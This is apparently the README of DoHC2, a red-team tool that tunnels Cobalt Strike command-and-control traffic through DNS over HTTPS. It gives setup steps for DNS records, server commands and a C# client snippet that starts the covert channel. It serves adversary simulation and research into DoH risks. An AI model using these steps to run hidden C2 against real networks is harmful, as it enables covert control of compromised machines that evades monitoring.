DoHC2
DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike (https://www.cobaltstrike.com).
Presentation
This project was released on October 23rd 2018 at Mitre ATT&CKcon.
Slides: Playing Devil’s Advocate to Security Initiatives with ATT&CK
Blog Article: DOH! DNS Over HTTPS Poses Possible Risks to Enterprises
Diagram
Usage
- Install and launch Cobaltstrike teamserver.
- Launch a beacon_http/beacon_https listener - Gotcha This can be firewalled off but you need this for External C2 to work.
- Load in script 'external_c2.cna' to Start ExternalC2 port 2222 (Firewall off).
- Install dependencies for python3 server.
- Allow port 53/udp to Internet (or to the DoH provider IP ranges).
- Create an A record on your domain to point to the teamserver/DNS server IP i.e. [A] entry.example.org -> 000.000.000.000
- Create an NS record to point to the A record for send channel (INPUTDOMAIN) i.e. [NS] send.example.org -> entry.example.org.
- Create an NS record to point to the A record for receive channel (OUTPUTDOMAIN) i.e. [NS] receive.example.org -> entry.example.org.
- Change INPUTDOMAIN and OUTPUTDOMAIN in DoHC2.py. Change encryption key/IV - this is used to encrypt the path from Teamserver-->Client Only (Encrypts Stager). Change max_records from 1 depending on DoH provider, some providers reorder records returned which is not currently handled. Max 5 works well with DNS server.
- Launch python3 DNS server.
- Build ExternalC2 library. Change encryption key/IV in DoHChannel.cs to match python3 server.
- Configure and launch DoHC2() as below being sure to set INPUTDOMAIN, OUTPUTDOMAIN and a DoH provider in format 'https://resolver.example.org/dns-query'.
Server
Python DNS server based on ACME DNS Server
- This interfaces raw DNS to the Cobalt Strike Teamserver on 127.0.0.1:2222 by default.
- Change INPUTDOMAIN and OUTPUTDOMAIN to be hosts that are NS of the server's external IP:
pip3 install -r requirements.txt
sudo python3 ./DoHC2.py
Library
@ryhanson's ExternalC2 with the following additions:
- Channels> DoHChannel.cs - DoH implementation
- Channels > Base32.cs (from https://gist.github.com/BravoTango86/2a085185c3b9bd8383a1f956600e515f)
- DoHC2.cs - DoH channel set-up / wrapper
- Newtonsoft.JSON (https://www.newtonsoft.com/json) is added to project
Example Client
- As with rest of ExternalC2 DoHC2 is COMVisible for JScript/DotNetToJS but this is a simple example to initiate it.
- The example client DoHC2Runner is a simple C# program to demo loading the library and setting it up as follows:
DoHC2 doh = new DoHC2();
doh.Configure("<INPUTDOMAIN>","<OUTPUTDOMAIN>","<DoH URI i.e. https://dns.google.com/resolve or https://dns.example.org/dns-query");
doh.Go();
Authors
- David Middlehurst - Twitter- @dtmsecurity
License
DoHC2
Some elements created by David Middlehurst, SpiderLabs as described above (Please refer to resepective licenses where other open-source projects are utilised).
Copyright (C) 2018 Trustwave Holdings, Inc.
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.